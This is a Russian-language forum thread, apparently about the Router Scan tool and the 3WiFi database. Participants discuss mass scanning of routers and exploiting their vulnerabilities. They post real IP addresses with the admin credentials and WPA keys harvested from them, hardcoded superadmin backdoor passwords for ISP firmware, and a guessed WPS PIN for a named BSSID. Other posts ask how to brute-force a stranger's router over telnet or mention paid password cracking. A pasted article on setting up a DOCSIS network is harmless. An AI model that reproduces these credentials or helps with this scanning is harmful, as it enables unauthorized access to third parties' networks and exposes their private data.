т.е. удаленное исполнение кода, и прочие нет смысла постить?



Да, но RCE тоже можно, если оно эксплуатируется через HTTP, и с помощью него можно добиться таких эффектов:



получить информацию и обойти авторизацию






не парсит и не подбирает пароль в qnap qts web server qts-212



Это не роутер, так что добавлять не стоит.



Кстати свежей запароленной ночной сборки нет?)



Нет, рано ещё, мало изменений.

Stine
02.06.2017, 03:15
Callback-функция - ключ к разгадке.



А в каком виде передаются данные в SetTableDataW(Row: DWord; Name, Value: PChar); ... я почему то не могу сохранить Name и Value типа Pchar в любую переменную, перепробовал разные типы... но почему то выводится только в визуальные компоненты... Причем, если потом скопировать из визуального компонента в переменную, тоже Access Violation.. не сталкивался ещё с таким.

binarymaster
02.06.2017, 10:54
я почему то не могу сохранить Name и Value типа Pchar в любую переменную, перепробовал разные типы...



Это указатели на null-terminated строки, ANSI либо Unicode в зависимости от постфикса A/W.

Покажите, как вы объявили callback-функцию, и как производите чтение из переменных, и я скажу, в чём ошибка.

sha9
02.06.2017, 13:29
Кстати свежей запароленной ночной сборки нет?)



пароль еще не пофиксили.

binarymaster
02.06.2017, 14:55
тогда придется создавать массив res, для каждого потока свой... row должно быть уникальное для каждого потока...



Да, абсолютно верно.



Ограничений на количество потоков в библиотеке нет?



Ограничивается объёмом INT.

Stine
02.06.2017, 21:32
Да, абсолютно верно.

Ограничивается объёмом INT.



Теперь проблема что в этой функции вообще не работают никакие локальные переменные, только глобальные, а как мне объявить внутри этой функции номер потока? Номер потока в любом случае локально внутри потока...

Пытался так объявлять, не работает...

tnew = class(tthread)

public

st:dword; //тут храню номер потока

protected

procedure execute; override;

end;

procedure SetTableDataW(Row: DWord; Name, Value: pchar); stdcall;

begin

if Row <> st then

Exit;

if Name='Auth' then res[st]:= Value ;

end;

Глобальные переменные работают, но как мне в них держать номера потоков?

binarymaster
02.06.2017, 22:05
Глобальные переменные работают, но как мне в них держать номера потоков?



Можно же просто сделать глобальный массив строк:

Rows: Array[0..999] of String; // 1000 строк

И таким образом получать нужные строки по нужному уникальному индексу. Сами активные (используемые) индексы хранить где-то ещё.

Stine
02.06.2017, 22:15
Сами активные (используемые) индексы хранить где-то ещё.



В них и проблема , в индексе, для результатов уже сделал глобальный массив res , вопрос как функции указать индекс потока...

res: array [1..2000] of string; // тут храню результаты... глобальная переменная... вопрос как указать функции индекс потока.... его номер... его нельзя глобально хранить... Переменная st , мне ж нужно указать функции какой Row этого потока, и индекс массива для сохранения результатов...

procedure SetTableDataW(Row: DWord; Name, Value: pchar); stdcall;

begin

if Row <> st then

Exit;

if Name='Auth' then res[st]:= Value ;

end;

Чем заменить st переменную?

binarymaster
03.06.2017, 12:34
Чем заменить st переменную?



Вы должны были прийти к пониманию, для чего нужна первая проверка условия в демо приложении...

PHP:



procedure SetTableDataW(Row:DWord;Name,Value:pcha r);stdcall;
begin
ifName='Auth'then

res[Row] :=Value;
end;

Stine
03.06.2017, 20:15
Вы должны были прийти к пониманию, для чего нужна первая проверка условия в демо приложении...

PHP:



procedure SetTableDataW(Row:DWord;Name,Value:pcha r);stdcall;&lt;br/&gt;begin&lt;br/&gt;ifName='Auth'then&lt;br/&gt;
res[Row] :=Value;&lt;br/&gt;end;&lt;br/&gt;



Меня строка if Row <> 123 в демке запутала )...

Все работает, на сотнях поков без глюков ... спасибо за консультацию...

VViktor
03.06.2017, 23:15
Спасибо, что держите нас в курсе событий!

Видимо придётся вводить новый ББ-код [sarcasm]


China версия Router Scan со всевозможными пряниками давно уже есть, гуглите)

Vltv
04.06.2017, 22:23
Доброе время суток! Вопрос может немного не по теме, но пока задам здесь. В базе 3Wifi появилась точка с МАК C8:BE:19:7A:50:04 и ESSID DSL_2640NRU. Нельзя ли подсказать пользователя и пароль на сам роутер, простые стандартные - не подходят, пытаюсь сбрутить через telnet -пока безрезультатно. Ещё раз извиняюсь если не по теме.

Triton_Mgn
04.06.2017, 22:25
Пароли на морду роутера не выдаются, в мануале RS описано - почему, по 3wifi есть отдельная тема.

Kakoluk
04.06.2017, 22:35
Чтоб наверняка, это Sagemcom F@st 1744 v4 с прошивкой Airocon.

Если на нём вдруг включится WPS, то пин код скорее всего будет 16111035.



Чёрт возми, отец родной, дайте страждущим "ночную сборку" уже!

Лично у меня, уже лежат отфильтрованные диапазоны для скана(спортивный интерес).

Ну таки хочется слегка отличится.(если конечно вы уже всё не посканили).

Felis-Sapiens
04.06.2017, 22:43
Чёрт возми, отец родной, дайте страждущим "ночную сборку" уже!

Лично у меня, уже лежат отфильтрованные диапазоны для скана(спортивный интерес).

Ну таки хочется слегка отличится.(если конечно вы уже всё не посканили).



Так они вроде и так парсятся. Use credentials superadmin:r007F&&RTCpw

http://s8.hostingkartinok.com/uploads/images/2017/06/7508ca3b807c63b97166d5f6a6965557.png

Kakoluk
04.06.2017, 22:58
Так они вроде и так парсятся. Use credentials superadmin:r007F&amp;&amp;RTCpw



А вот можно их добавить в первую проверку пары в експлойт по слепку отклика? Ну так, из лени и для автоматизации. Use credentials для особых случаев, что то вроде последнего редута.

Felis-Sapiens
04.06.2017, 23:01
А вот можно их добавить в первую проверку пары в експлойт по слепку отклика? Ну так, из лени и для автоматизации. Use credentials для особых случаев, что то вроде последнего редута.



Уже сделано.

sha9
05.06.2017, 10:39
China версия Router Scan со всевозможными пряниками давно уже есть, гуглите)



опять крякнутая, с вирусняками, байду и рекламами? если это понимать под пряниками - тады - ой. бегу гуглить...

опять Rafotech отличилась...блин...

Hose12
06.06.2017, 11:28
Вопрос не по теме, но народ тут знающий, просто скажите возможно такое или нет.

А именно: В подъезде срезали камеру, есть ли возможность найти её каким-то образом сканируя диапазоны ?

По серийнику там или я не знаю...

Спасибо.

binarymaster
06.06.2017, 11:34
В подъезде срезали камеру, есть ли возможность найти её каким-то образом сканируя диапазоны ?



По-вашему если её срезали, то обязательно подключили куда-то ещё?

Если бы на камере была установлена нестандартная прошивка, которая бы пинговала внешний сервер в ожидании команд, то всё было бы проще. Ну и ещё плюс встроенный Wi-Fi адаптер для обзора видимых сетей и получения геолокации по ним.

Kakoluk
06.06.2017, 12:02
Прошу исправить мелкую ошибку при парсе Boa ADSL (HG110 | Ralink-3162).

Вот то что пишет в базу:


"79.126.46.124";"80";"20";"Done";"admin:engel666";"Boa ADSL (Language HG110 | Ralink-3162)";"";"";"BC:66:41:89:09:2C";"home";"WPA/WPA2";"Aq123456";"";"192.168.0.1";"255.255.255.0";"79.126.46.124";"255.255.255.255";"79.126.0.1";"213.177.97.201 35.165.139.186";"";"";""

sha9
06.06.2017, 12:14
Вопрос не по теме, но народ тут знающий, просто скажите возможно такое или нет.

А именно: В подъезде срезали камеру, есть ли возможность найти её каким-то образом сканируя диапазоны ?

По серийнику там или я не знаю...

Спасибо.



попробуйте по маку. но это как ловить черную кошку... (ну дальше вы знаете)

Kakoluk
06.06.2017, 12:43
попробуйте по маку. но это как ловить черную кошку... (ну дальше вы знаете)


Хотя, если допустить что бандиты продадут IP камеру в том же городе, то можно периодически пролетать сканером местные участки провайдеров,

на определённом порту(камеры). Может выстрелить.

binarymaster
06.06.2017, 12:52
79.126.46.124



Тут нет Boa ADSL, тут есть DD-WRT.

Kakoluk
06.06.2017, 12:55
Тут нет Boa ADSL, тут есть DD-WRT.



Это двух-трёх дневной давности скан, я только сейчас заметил, когда базу сращивал/просматривал.

Если найду снова, постараюсь побыстрее указать.

Kakoluk
06.06.2017, 15:48
И ещё прошу посмотреть ошибку при парсе (Airocon F@st 1744, v4, firmware: F1744R_V1.49_RTC_20E_832), когда вместо wpa ключа в базу попадают

"********". И такое довольно часто.

Только что выборку насканил: https://yadi.sk/d/1zPZ6zzB3JsaiT

P.S. Если только это ещё не исправлено в ожидаемой ночной сборке.

binarymaster
06.06.2017, 16:05
И ещё прошу посмотреть ошибку при парсе (Airocon F@st 1744, v4, firmware: F1744R_V1.49_RTC_20E_832), когда вместо wpa ключа в базу попадают

"********".



Это уже пофиксил @Felis-Sapiens (https://forum.antichat.xyz/members/268504/) неделю назад.

Gashek
06.06.2017, 23:48
Народ, реально заебало....

Сканируешь, сканируешь понимаешь для себя и сообщества на 3wifi, а тут халявщик подтягивается, который на платном Платный подбор пароля WI-FI WPA WPA2 уже овердохуя бабосы стрежет, сколько раз замечал- пользуется найденными паролями.

ХОТЬ РАЗ БЫ НАПИСАЛ, ЧТО ИНФА С 3WIFI, как обычно на бесплатном Перебор и подбор пароля Wi-FI делают комраты, так нет, этот жлобина Mistral, ни слова о нашем труде.

Хоть раз бы упомянул, что с 3WIFI спер пароли, редиска,

а то прензий к инфе на сайте есть, а сам тупо тырит пароли

Payer
07.06.2017, 00:39
ХОТЬ РАЗ БЫ НАПИСАЛ, ЧТО ИНФА С 3WIFI



Для успешного подбора кроме словаря с 3wifi нужны еще куча словарей.

Также нужны усидчивость, ловкость, удача, смекалка, память и куча других качеств.

Времени потратить тоже нужно. Иногда определить с какого именно словаря прилетел результат сложнее, чем найти сам пароль.

----------

Я с 3wifi работаю для себя и карту строю для себя. А итоговым словарем пользоваться могут все.

Вроде все честно.

Andrey9999
07.06.2017, 00:56
Да все более-менее шарящие брутеры пользуются 3wifi

Mistral
07.06.2017, 01:47
250 р.

ESSID: MGTS_GPON_4984

BSSID: 94:4A:0C:AC:E8:62

http://rgho.st/8D9lBC45x

копировал с бесплатной темы т.к. ни кто не ответил



https://forum.antichat.ru/threads/417617/page-58#post-4051816



ESSID: MGTS_GPON_4984

BSSID: 94-4A-0C-AC-E8-62

http://sendfile.su/1339188

оплачу 100$, если сегодня, срочно надо



https://forum.antichat.ru/threads/417617/page-72#post-4092804

Вы б это для начала пояснили.

khamyk
07.06.2017, 10:36
так и о том и речь, он же халявщик и ловкость его конек, усидчивый понимаешь опять)))

чё за смекалка ??!!, это же тупо, хотя бы на этом сайте



Он же не сам выпрашивает деньги.Без лоха....ну дальше все знают.

binarymaster
07.06.2017, 11:11
Вы б это для начала пояснили.



http://pics.wikireality.ru/upload/thumb/f/f3/Kiselyov-2014_66401280_orig_.jpeg/280px-Kiselyov-2014_66401280_orig_.jpeg

afonn
07.06.2017, 20:41
https://habrastorage.org/storage/habraeffect/4d/6e/4d6eb0ced5114bf796e01fda0612cae6.jpg

Собственно аббревиатуру DOCSIS слышали многие, но далеко не все представляют что это и зачем оно нужно. Самые любопытные могли, даже просветится этим вопросом в википедии, но как показывает практика довольно много вопросов все равно остается. Итак, начинаем срывать покровы давайте разберемся с вопросами:

1. что это?

2. кому это нужно?

3. что для этого нужно?

4. как начать?

Слабонервных не желающих вникать в «How it's made?» просьба под хабракат не заглядывать — там ничего интересного нет.

здесь Для совсем несведущих это (очень грубо) такой большой и дорогой модем к которому линкуются абонентские модемы.

4. Основным требованием к сети является – обслуживаемость и наличие на усилителях обратного канала. Обслуживаемость – это перманентное вырезание нелегалов и слежение за уровнями сигнала в прямом и обратном каналах. Сезонный шат сигнала может очень существенно подпортить жизнь пользователям и вашей службе поддержки.

5. С кратким перечнем производителей модемов можно ознакомиться здесь. Docsis модем является довольно специфичным устройством предоставляющий довольно широкие возможности – начиная ограничением пропускной способности абонента прямо на его модеме и заканчивая фильтрами (грубо удаленно управляемым фаерволом).

С чего начать?

В последнее время ко мне с завидной регулярностью стучат админы начальство которых, руководствуясь соображениями, изложенными в «Кому это нужно?» купило CMTS (почему-то чаще всего это что-то типа подержанных BSR1000, BSR2000, CiscoUBR) и сказало «засунь интернет в КТВ сеть».

Для людей знакомых уже с Ethernet или ADSL схема работы DOCSIS сети может оказаться не совсем прозрачной а количество телодвижений нужных для того чтобы хотя бы один модем запингался – окончательно упоротым. Довольно сложно что-то сделать не представляя общих принципов того как это должно работать. Первая мысль которая приходит в голову это прикрутить модем напрямую к CMTS и посмотреть что получится. Естественно не получится ничего – модем будет просто светомузыкально мелькать лампочками и все. Больше ничего не случится.

При попытке соединиться модем сканирует весь диапазон частот на тему наличия downstream/upstream и если находит пытается получить адрес посредством DHCP для модема, если адрес получен — модем по TFTP пытается получить специальным образом собранный конфиг для себя родимого, после чего если конфиг нормально прожеван пытается получить по DHCP адрес для CPE (customer-provided equipment) коим являться будет скорее всего сетевая плата либо роутер.

Работать в норме на тестовом стенде оно должно так:

1. CMTS настроена

2. На сервере подняты вышеуказанные сервисы

3. модем подключен через пачку тапов чтобы обеспечить номинальные уровни сигнала для DS/US.

1. На настройке CMTS заострять внимание мы особо не будем, ибо в зависимости от производителя, физических реалий сети и планируемой топологии сети она будет очень сильно разниться. Радует наличие всеобъемлющей документации, которое шло в комплекте со всеми попадавшими ко мне в руки дивайсами – думаю по ней должно быть все более-менее понятно для людей знакомых с cisco-like интерфейсом и общей теорией настройки сетевых устройств.

Минимальные пассы руками которые следует провести над CMTS чтобы она была готова к стендовым испытаниям выглядят как:

— прописываем частоту DS

— прописываем частоты и модуляции для US

— прописываем адрес DHCP сервера который мы будем рилеить

— прописываем secret key для конфигов

— прописываем пароли

— сохраняемся

2. Поднимаем на сервере нужные нам сервисы.

# cd /usr/ports/net/isc-dhcp31-server/ && make install (собираем с поддержкой Option82)

tftpd скорее всего у нас есть по умолчанию, просто раскоментируем его в /etc/inetd.conf

#cd /usr/ports/net-mgmt/docsis && make install

Который нужен нам для генерации бинарных конфигов для DOCSIS-совместимых модемов как гласит pkg-descr.

Допустим CMTS мы настроили как 10.10.10.9 рилеящую DHCP риквесты на сетевую нашего хоста с айпишкой 10.10.10.10 которая смотрит на CMTS. Тогда наш /usr/local/etc/dhcpd.conf должен выглядеть следующим образом

option domain-name "catv";

option domain-name-servers 10.10.10.10;

default-lease-time 3600;

max-lease-time 43200;

authoritative;

ddns-update-style none;

log-facility local7;

one-lease-per-client true;

deny duplicates;

subnet 10.10.200.0 netmask 255.255.248.0 {

default-lease-time 3600;

max-lease-time 86400;

option domain-name-servers 10.10.10.10;

option subnet-mask 255.255.248.0;

option routers 10.10.200.1;

include "/usr/local/etc/users_dhcp.conf";

}

subnet 10.10.100.0 netmask 255.255.248.0 {

default-lease-time 3600;

option subnet-mask 255.255.248.0;

option routers 10.10.100.1;

server-name "10.10.10.10";

option tftp-server-name "10.10.10.10";

option bootfile-name "cm_config/other.b";

next-server 10.10.10.10;

filename "cm_config/other.b";

option time-servers 10.10.10.10;

option time-offset 2;

include "/usr/local/etc/modems_dhcp.conf";

}

Из чего должно быть понятно что мы резервируем под модемы сеть 10.10.100/21 и под пользовательские CPE сеть 10.10.200/21

Для простоты работы в будущем хосты для сабнетов мы инклудим из /usr/local/etc/modems_dhcp.conf и /usr/local/etc/users_dhcp.conf соответственно. Для начала в /usr/local/etc/modems_dhcp.conf мы вписываем наш тестовый модем в виде

host m1002 {

hardware ethernet 00:ff:ff:55:ff:f2;

fixed-address 10.10.100.3;

filename "cm_config/testmodem.b";

}

А в и /usr/local/etc/users_dhcp.conf добавляем свой тестовый хост:

host m10102002 {

hardware ethernet 00:cc:cc:99:aa:ff;

fixed-address 10.10.200.2;

}

Директива filename должна намекать на то что в ней содержится путь (относительно tftp root который обычно в /tftpboot) к забинареному конфигу модема. В простейшем случае конфиг модема (не пригодный к реальному использованию! For testing purposes only! Achtung!) будет выглядеть следующим образом:

#cat /tftpboot/cm_source/testing

Main {

NetworkAccess 1;

GlobalPrivacyEnable 0;

UsServiceFlow

{

UsServiceFlowRef 200;

QosParamSetType 7;

MaxRateSustained 0;

SchedulingType 2;

}

DsServiceFlow

{

DsServiceFlowRef 100;

QosParamSetType 7;

TrafficPriority 3;

MaxRateSustained 0;

}

MaxCPE 16;

}

Теперь нам следует его скомпилить в приемлемый для модема вид при помощи ранее собранной утилиты docsis используя указанный на CMTS secret-key

#echo "sosecret" > /somewhere/key

#docsis -e /tftpboot/cm_source/testing /somewhere/key /tftpboot/cm_config/testing.b

Прописываем рауты для сетей модемов, и пользователей на CMTS в rc.conf:

static_routes="cable modem"

route_cable="10.10.200.0/21 10.10.10.9"

route_modem="10.10.100.0/21 10.10.10.9"

3. собираем из спичек и желудей пигтейлов и тапов конструкцию объединяющую DS и один из US и обеспечивающую прохождение на модем указанных в документации уровней сигнала.

Если мы все сделали правильно то на CMTS в

bsr#show cable modem

Мы увидим что-то типа

Cable 0/0/D0/U0/C0 431 online 1458 26.0 10.10.100.3 00ff.ff55.fff2

И соответственно наши тестовый модем и тестовый хост которые как мы помним 10.10.100.3 и 10.10.200.2 должны пингаться.

Видите как все просто и наглядно? – а вы боялись. =)

В случае сегментирования сети на множество CMTS для обеспечения повышения отказоустойчивости и быстродействия все выглядит аналогичным образом. И сводиться к разнесению разных сетей по раутам.

Вышеприведенный конфиг не адекватен для реального применения по ряду причин:

Как минимум:

— нету фильтров на изоляцию пользователей

— нету прописанных snmp для сбора статистики

— нету привязки модема к конкретному CPE

Еще хорошо было бы сделать:

— шейпинг канала прямо на устройстве

— учесть особенности различных дивайсов

— отрубить веб-лицо модема, пользователю там делать нечего

— грамотно построить QoS

Изначально я очень хотел написать пошаговый мануал по тому, как сделать не просто чтобы «ходили интернеты» а и по тому, как грамотно их продать конечным пользователям, собственно с примерами конфигов, готовой АСР итд. Но так как писатель из меня честно-говоря никакой — мне банально стыдно показывать свой быдлокод который к тому же довольно узкоспецифичен и в любом случае требует глубокой доводки под конкретного оператора

В общих чертах требования к биллингу работающему в DOCSIS сети очень просты:

— уметь считать трафик

— уметь считать деньги

— делать из посчитанных денег трафика гибкие тарифы

— гибко ограничивать пользовательскую полосу

— уметь на лету компилировать конфиги к модемам на каждого пользователя + править хосты dhcpd.

Если с первыми четырьмя пунктами все понятно – и собственно все АСР ими в основном и занимаются, то на последнем следует заострить внимание на последнем. Естественно можно выдать один конфиг на всех, а потом аутентификацию пользователя производить при помощи внутренних механизмов АСР (разношерстные авторизаторы) либо скажем методом PPtP тунелля но это я считаю просто дополнительным костылем и сознательным отказом от очень удобных возможностей предоставляемых технологией.

Думаю сейчас много-много людей скажет, что технология мертва, дорога, не актуальна и потыкают меня мордочкой в FTTB, PON, HCNA. Да я в курсе что такие есть и что например в плотнозаселенных многоэтажках намного цена/скорость порта в десятки раз дешевле с FTTB и что HCNA предоставляет по тому же коаксиалу намного более вкусные скорости при сопоставимой стоимости абонентских железок и отсутствии в необходимости покупки относительно дорогой CMTS. Если интересно могу на пальцах объяснить, почему FTTB в частном секторе это дорого, и почему там же HCNA сводится к «почти FTTB» по стоимости порта а так же почему публика пока еще не готова к PON. Опять же для применения любой пока еще живой технологии всегда есть свои мотивы от «давайте использовать существующую сеть» до «иначе будет слишком дорого и долго». Опять же выбор играть в демпинг и гоняться со скоростями домашних сетей не самый хороший вариант при вышеуказанных ТТХ и собственно козырем DOCSIS провайдера должны быть имхо сервисы предоставляемые по одному кабелю и их качество.

На данном этапе развития DOCSIS 2.0 может в полнее успешно конкурировать с ADSL а 3.0 наступает на пятки остальным как перспективная платформа для Triple Play.

Как всегда в конце статьи я использую свою слабую отмазку звучащую как:

«Да я не грамотен, я знаю. Язык не родной, в школе не учили, хотя догадываюсь это слабая отмазка. Если вы воспринимаете пропущенную запятую как личное оскорбление – приношу извинения заранее. Честно – я не хотел»

Как правило, действует

Kakoluk
07.06.2017, 20:48
Прекрасно. Только не совсем понятно, зачем копипастить статейку, в бороде которой может запутаться мамонт: https://habrahabr.ru/post/102429/ ?

afonn
07.06.2017, 20:51
для информации друг

Payer
08.06.2017, 19:54
http://cs8.pikabu.ru/post_img/2016/02/14/6/1455442826180612406.jpg

Kakoluk
08.06.2017, 22:29
Почему то не парсится пароль из пары на вебку в ZTE ZXDSL 931VII, hardware: 1.0.0, firmware: 2.0.00.RUSS.

Выборка(10-ти минутной давности). https://yadi.sk/d/8jBxupqR3Jwxww

Felis-Sapiens
08.06.2017, 22:56
Почему то не парсится пароль из пары на вебку в ZTE ZXDSL 931VII, hardware: 1.0.0, firmware: 2.0.00.RUSS.

Выборка(10-ти минутной давности). https://yadi.sk/d/8jBxupqR3Jwxww



Потому что там используется уязвимость, а пароль берётся со страницы user_info_gch.gch, на этих экземплярах он скрыт. Надо будет реализовать, чтобы пароль брался из конфига (здесь он просто сжат) manager_dev_config_t.gch

К слову, у первого - superadmin:zteadmin123, admin:6pjhL43p2B

muradddddd
09.06.2017, 21:28
А какие еше порты можно добавить в роутер скан подскажите чтоб больше сетей ловил?

binarymaster
09.06.2017, 22:34
А какие еше порты можно добавить в роутер скан подскажите чтоб больше сетей ловил?



Выполните поиск по теме по ключевому слову "порты".

hunt.lsk
10.06.2017, 21:43
Не парсит http://176.97.189.101:8080/

пишет httpd/2.0

binarymaster
10.06.2017, 21:44
Не парсит http://176.97.189.101:8080/

пишет httpd/2.0



У меня всё парсит:


Address: http://176.97.189.101:8080/
Time: 46 ms
Device: ASUS RT-N66U, firmware: 2.0
BSSID: BC:EE:7B:93:79:88
ESSID: AsusRT-N66U

hunt.lsk
10.06.2017, 21:51
А этот парсит http://176.97.188.207:80

у меня yealink embed httpd

binarymaster
10.06.2017, 21:53
А этот парсит http://176.97.188.207:80

у меня yealink embed httpd



И у меня тоже. Enterprise IP phone SIP-T19P_E2

Но ведь это не роутер. В чём проблема?

hunt.lsk
10.06.2017, 21:55
Но ведь это не роутер



а что это admin:admin

добавить можно?

а этот парсится http://176.97.187.219:8080/

http://176.97.168.69:80 отображается как Web server

http://176.97.168.105:80 отображается как Ag [47]

Два последних Keenetic Lite III

binarymaster
11.06.2017, 01:28
а этот парсится http://176.97.187.219:8080/



Потому что это роутер.



http://176.97.168.69:80 отображается как Web server

http://176.97.168.105:80 отображается как Ag [47]

Два последних Keenetic Lite III



У меня определяются корректно: ZyXEL Keenetic Lite III (NDMSv2)

Похоже, у вас старая версия программы, обновляйте.

Ossen
11.06.2017, 01:30
ZyXEL Keenetic Lite III.



Кстати у меня их вообще не парсит именно Keenetic Lite III

Nem0
11.06.2017, 06:47
Странная история парсятся данные на TP-LINK TL-WR841N а логин пасс не показывает... это почему так?

zimmer
11.06.2017, 06:53
Странная история парсятся данные на TP-LINK TL-WR841N а логин пасс не показывает... это почему так?



срабатывает эксплоит

binarymaster
11.06.2017, 12:10
Кстати у меня их вообще не парсит именно Keenetic Lite III



Присылайте отладочные дампы, будем смотреть, что не так.

muradddddd
13.06.2017, 17:44
Tp Link 8B2C мак адрес 84:16:F9:9B:8B:2C неподскажете пин код какой стандартный с сайта не подходит